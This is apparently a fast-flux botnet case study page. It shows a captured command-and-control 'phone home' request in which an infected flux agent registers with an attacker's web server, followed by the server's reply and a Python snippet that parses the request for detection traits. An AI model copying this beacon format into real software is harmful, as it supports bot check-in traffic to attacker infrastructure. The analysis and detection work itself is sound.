Fast-Flux Proxy Samples
In our fast-flux case study, this is where the infected flux agent makes its initial "phone home" connection to a remote web server, reporting to the attacker that the victim system has been successfully infected and is standing by to provide flux-net services.
GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2007 07:55:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Length: 19
Connection: close
Content-Type: text/html; charset=UTF-8

Added Successfully!
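As an added detection example (not part of the original case study), the Python below parses the registration request shown above and reports which of its traits a proxy-log or IDS rule could key on. The function name, the field set and the uptime threshold are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request copied from the capture on this page.
SAMPLE = (
    "GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1"
    "&version=2.0&build=beta004&uptime=244813135872w%20244813135872d"
    "%20244813135892h%20244813135919m%20244813135929s HTTP/1.1\r\n"
    "User-Agent: MSIE 7.0\r\n"
    "Host: xxx.ifeelyou.info\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)

# Assumption: the registration fields seen in this single sample.
BEACON_FIELDS = {"os", "user", "status", "version", "build", "uptime"}
MAX_WEEKS = 52 * 20  # assumption: no host reports more than ~20 years of uptime


def analyze_request(raw):
    """Parse one raw HTTP request; return (query fields, list of findings)."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    _method, target, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qs percent-decodes values, so %20 in uptime becomes a space.
    query = {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}

    findings = []
    if BEACON_FIELDS.issubset(query):
        findings.append("registration-style query string")
    # Genuine Internet Explorer user agents begin with "Mozilla/".
    ua = headers.get("user-agent", "")
    if "MSIE" in ua and not ua.startswith("Mozilla/"):
        findings.append("bare MSIE user agent")
    # Uptime is sent as "<n>w <n>d <n>h <n>m <n>s"; sanity-check the weeks.
    m = re.match(r"(\d+)w (\d+)d (\d+)h (\d+)m (\d+)s$", query.get("uptime", ""))
    if m and int(m.group(1)) > MAX_WEEKS:
        findings.append("implausible uptime")
    return query, findings


if __name__ == "__main__":
    print(analyze_request(SAMPLE))
```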